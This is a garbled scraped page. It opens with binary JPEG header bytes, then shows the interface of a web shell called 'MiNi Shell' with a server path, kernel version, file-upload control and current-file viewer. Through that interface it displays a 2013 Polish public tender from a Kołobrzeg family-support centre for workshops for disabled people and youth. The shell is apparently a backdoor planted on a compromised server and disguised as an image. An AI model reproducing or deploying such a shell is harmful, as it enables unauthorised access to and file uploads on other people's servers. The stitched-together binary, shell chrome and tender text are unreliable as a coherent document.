JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130717/278930-N-2013.html

<p class="kh_header"><b>Kołobrzeg: Na usługę zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Jesteśmy aktywni edycja 2013</b><br>
<b>Numer ogłoszenia: 278930 - 2013; data zamieszczenia: 17.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Kamienna 3, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 94 35 48 066, faks 94 35 48 066.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pcprkolobrzeg.finn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na usługę zorganizowania działań w ramach aktywnej integracji dla uczestników projektu Jesteśmy aktywni edycja 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - Warsztaty z doradcą zawodowym dla osób niepełnosprawnych.
Część II - Grupy wsparcia z psychologiem dla osób niepełnosprawnych.
Część III - Warsztaty gospodarowania własnym budżetem domowym dla osób niepełnosprawnych.
Część IV - Warsztaty zdrowego stylu życia dla osób niepełnosprawnych.
Część V - Zabiegi dla uczestników projektu dopasowane i zalecane przez lekarza uwzględniające niepełnosprawność beneficjentów.
Część VI - Warsztaty komputerowe dla osób niepełnosprawnych.
Część VII - Warsztaty wizażu i autoprezentacji dla osób niepełnosprawnych.
Część VIII - Warsztaty z przedsiębiorczości - tworzenie własnej firmy dla osób niepełnosprawnych.
Część IX - Warsztaty komunikacji interpersonalnej dla osób niepełnosprawnych.
Część X - Warsztaty z doradcą zawodowym dla młodzieży w wieku od 18 do 25 lat.
Część XI - Warsztaty gospodarowanie własnym budżetem domowym - program przygotowujący do samodzielności dla młodzieży w wieku od 18 do 25 lat.
Część XII - Kurs na prawo jazdy na kategorie B dla młodzieży w wieku od 18 do 25 lat.
Część XIII - Warsztaty z doradcą zawodowym - kształtowanie własnej przyszłości dla młodzieży w wieku od 15 do 17 lat.
Wykonawca w ramach zamówienia zobowiązany będzie tam gdzie jest to niezbędne:
-	zapewnić salę szkoleniową/pracownię wyposażoną w niezbędny sprzęt i urządzenia do przeprowadzenia zajęć zlokalizowaną na terenie miasta Kołobrzeg,
-	wyposażyć Uczestników w materiały biurowe, piśmiennicze (w tym co najmniej długopis, ołówek, zeszyt/notatnik do każdych zajęć, ubrania robocze na kursy zawodowe (gdzie są niezbędne),
-	zapewnić catering podczas zajęć, tj. w tym co najmniej kawa/herbata dostępne podczas każdej z przerw, ciastka (mieszanka deserowa - delicje, wafelki, ciastka kruche): 15 dkg różnych ciastek na 1 osobę, oraz jeden ciepły posiłek składający się z co najmniej drugiego dania (gramatura min. 500 g); ponadto 1 x 0,33 l wody mineralnej niegazowanej - 1 osobę, 1 x 0,33 l wody mineralnej gazowanej - 1 osobę, cukier podany w cukiernicy, mleko płynne 2%, cytryny. Sposób podania - estetycznie, w formie stołu szwedzkiego z zapewnieniem filiżanek, talerzyków, szklanek, łyżeczek i serwetek w czasie trwania szkolenia. Posiłki powinny posiadać odpowiednie walory smakowe i zapachowe oraz estetyczny wygląd. Wykonawca przy oferowaniu obiadów uwzględniać będzie świeże produkty. Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia,
-	zapewnić kadrę posiadającą wymagane wykształcenie, kwalifikacje i doświadczenie zawodowe,
-	oznaczyć sale szkoleniowe oraz dokumenty związane z realizacją zamówienia                     w sposób zgodny z dokumentem: Wytyczne w zakresie oznaczania projektów PO KL dostępnym na stronie www.efs.gov.pl,
-	sporządzania imiennej i oznaczonej zgodnie z wytycznymi listy obecności na każdych zajęciach,
-	prowadzenia Dziennika zajęć,
-	dokonania ewaluacji szkoleń/warsztatów w zakresie zdobycia przez Uczestników oczekiwanych kwalifikacji i umiejętności,
-	przedstawienia Zamawiającemu list obecności, Dzienników zajęć oraz Raportu końcowego potwierdzającego osiągnięcie zakładanych wskaźników,
-	współpracy z Zamawiającym w zakresie ustalania dokładnego harmonogramu zajęć,
-	wydania każdemu z Uczestników kończącemu szkolenie/kurs/warsztat imiennego zaświadczenia/certyfikatu/świadectwa potwierdzającego zdobyte kwalifikacje                            i umiejętności,
-	zapewnienia, żeby dzięki kursom zawodowym Uczestnicy zdobyli kwalifikacje                        i podnieśli swoje praktyczne umiejętności,
-	zapewnić możliwość stałego, bezpośredniego kontaktu z zamawiającym, w tym informować Zamawiającego na bieżąco o harmonogramie zajęć oraz umożliwić mu przeprowadzenie wizyt monitorujących w miejscu realizacji zamówienia,
-	ubezpieczyć skierowane osoby od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze do i z miejsca szkolenia,
-	sfinansować niezbędne badania lekarskie przed rozpoczęciem kursu,
-	zapewnić warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy                     w trakcie szkolenia.

Dodatkowe informacje dotyczące zajęć:
-	łączny czas zajęć w ciągu jednego dnia nie może przekroczyć 8 godzin szkoleniowych,
-	1 godzina szkoleniowa odpowiada 1 godzinie lekcyjnej, tj. 45 minut.
-	1 godzina zegarowa tj. 60 min. - 45 min zajęcia i 15 min przerwy. 

	Ponadto Wykonawca zobowiązuje się do realizacji zamówienia w sposób zgodny z ustawą z dnia 29 sierpnia 1997 r. o ochronie danych osobowych oraz w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100, poz. 1024) i co za tym idzie przetwarzać dane osobowe Uczestników tylko i wyłącznie w celu realizacji niniejszego zamówienia.

Po stronie Zamawiającego leży:

-	rekrutacja Uczestników,
-	przekazanie ich listy Wykonawcy,
-	odbiór prac..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 80.53.00.00-8, 85.31.25.00-4, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 24.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I, X i XIII Zamawiający uzna warunek za spełniony jeżeli Wykonawca wpisany jest do rejestru podmiotów prowadzących agencje zatrudnienia zgodnie z art. 18 ustawy o promocji zatrudnienia i instytucjach rynku pracy lub w przypadku ofert osób fizycznych nie prowadzących działalności gospodarczej jest to osoba posiadająca licencję zawodową minimum I stopnia zgodnie z art. 92 wyżej wymienionej ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 12 - Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże iż dysponuje i/lub będzie dysponował na terenie miasta Kołobrzeg placem manewrowym do praktycznej nauki jazdy oraz co najmniej jednym pojazdem przystosowanym do nauki jazdy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, że dysponuje i/lub będzie dysponował osobami, które będą odpowiedzialne za świadczenie usług czyli:
Część 1 - co najmniej jedna osoba
-	posiadająca wykształcenie wyższe,
-	będąca doradcą zawodowym,
-	posiadająca co roczne doświadczenie w prowadzeniu szkoleń/warsztatów,
-	świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą
Część 2 - co najmniej jedna osoba
-	posiadająca wykształcenie wyższe psychologiczne,
-	posiadająca co najmniej dwuletnie (w czasie ostatnich 5 lat) doświadczenie w pracy w zawodzie psychologa,
-     świadczyła w przeszłości co najmniej jedną      
      usługę o tematyce tożsamej z zamawianą.
Część 3 - co najmniej jedna osoba
-     posiadająca wykształcenie wyższe      
      ekonomiczne,
-     świadczyła w przeszłości co najmniej jedną      
      usługę o tematyce tożsamej z zamawianą.
Część 4 - co najmniej jedną osobę
-	co najmniej jedna osoba będąca dietetykiem, która świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą.
Część 5 - co najmniej trzy osoby będące 
-     fizjoterapeutami, 
-     posiadające co najmniej dwuletnie (w czasie    
      ostatnich 5 lat) doświadczenie w pracy       
      związanej z rehabilitacją osób 
      niepełnosprawnych, 
-     które świadczyły w 
      przeszłości co najmniej jedną usługę o 
      tematyce tożsamej z zamawianą
      oraz 
-     co najmniej jedną osobą będącą 
      kosmetyczką posiadającą co najmniej 
      dwuletnie (w czasie ostatnich 5 lat) 
      doświadczenie w pracy w SPA.

Część 6 - co najmniej jedną osobę z wykształceniem wyższym informatycznym, 
-    która świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą.

Część 7 - co najmniej jedna osoba będąca fryzjerką, posiadająca ukończony kurs i/lub szkołę fryzjerską, 
-   posiadające co najmniej dwuletnie (w czasie      
    ostatnich 5 lat) doświadczenie w pracy   
    fryzjerki, 
-   która świadczyła w przeszłości co 
    najmniej jedną usługę o tematyce tożsamej z        
    zamawianą,
oraz  
-   co najmniej jedna osoba będąca kosmetyczką, 
    posiadająca ukończony kurs i/lub szkołę 
    kosmetyczną, 
-   która posiada co najmniej dwuletnie (w czasie     
    ostatnich 5 lat) doświadczenie w pracy na 
    stanowisku kosmetyka.
Część 8 - co najmniej jedna osoba posiadająca wykształcenie wyższe, która prowadziła lub prowadzi działalność gospodarczą przez okres minimum 3 lat w czasie ostatnich 5 lat, która świadczyła w przeszłości co najmniej jedną      
      usługę o tematyce tożsamej z zamawianą.
Część 9 - co najmniej jedna osoba posiadająca wykształcenie wyższe psychologiczne,
-	posiadająca co najmniej dwuletnie (w czasie ostatnich 5 lat) doświadczenie w pracy w zawodzie psychologa,
-     świadczyła w przeszłości co najmniej jedną      
      usługę o tematyce tożsamej z zamawianą.
Część 10  - co najmniej jedna osoba
-	posiadająca wykształcenie wyższe,
-	będąca doradcą zawodowym,
-	posiadająca co roczne doświadczenie w prowadzeniu szkoleń/warsztatów,
-	świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą
Część 11 - co najmniej jedna osoba
-	posiadająca wykształcenie wyższe pedagogiczne,
-	posiadająca co najmniej dwuletnie (w czasie ostatnich 5 lat) doświadczenie w pracy w zawodzie pedagoga,
-	świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą
oraz co najmniej jedna osoba
-	posiadająca wykształcenie wyższe na kierunku socjologia,
-	posiadająca co najmniej dwuletnie (w czasie ostatnich 5 lat) doświadczenie w pracy z młodzieżą,
-	świadczyła w przeszłości co najmniej jedną usługę o tematyce tożsamej z zamawianą.
Część 12 - Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże iż dysponuje i/lub będzie dysponował co najmniej jednym instruktorem praktycznej i teoretycznej nauki jazdy kategorii B.
Część 13 - co najmniej jedna osoba
-	posiadająca wykształcenie wyższe,
-	będąca doradcą zawodowym,
-	posiadająca co roczne doświadczenie w prowadzeniu szkoleń/warsztatów,
      świadczyła w przeszłości co najmniej jedną  
      usługę o tematyce tożsamej z zamawianą.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Doświadczenie Wykonawcy - 30</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych przewiduje możliwości dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
-	zmianie mogą podlegać omyłki pisarskie nie rzutujące na zamiar i cel stron wynikający z umowy,
-	w przypadku zmian na liście Uczestników projektu i/lub Indywidualnych Planów Działania liczba osób biorących udział w poszczególnych kursach/szkoleniach warsztatach może ulec zmianie. Do obliczenia należnego wynagrodzenia zastosuje się wówczas algorytm (cena ryczałtowa za daną liczbę uczestników przewidzianych SIWZ * liczba Uczestników biorących udział w zajęciach).
-	w trakcie realizacji zamówienia osoby wskazane w ofercie jako odpowiedzialne za świadczenie usług za pisemną zgodą Zamawiającego będą mogły zostać zastąpione innymi o nie niższych kwalifikacjach, wykształceniu i doświadczeniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pcprkolobrzeg.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w PCPR w Kołobrzegu, ul. Kamienna 3, 78-100 Kołobrzeg..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2013 godzina 09:45, miejsce: w PCPR w Kołobrzegu, ul. Kamienna 3, 78-100 Kołobrzeg..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest przez Unię Europejską w ramach środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com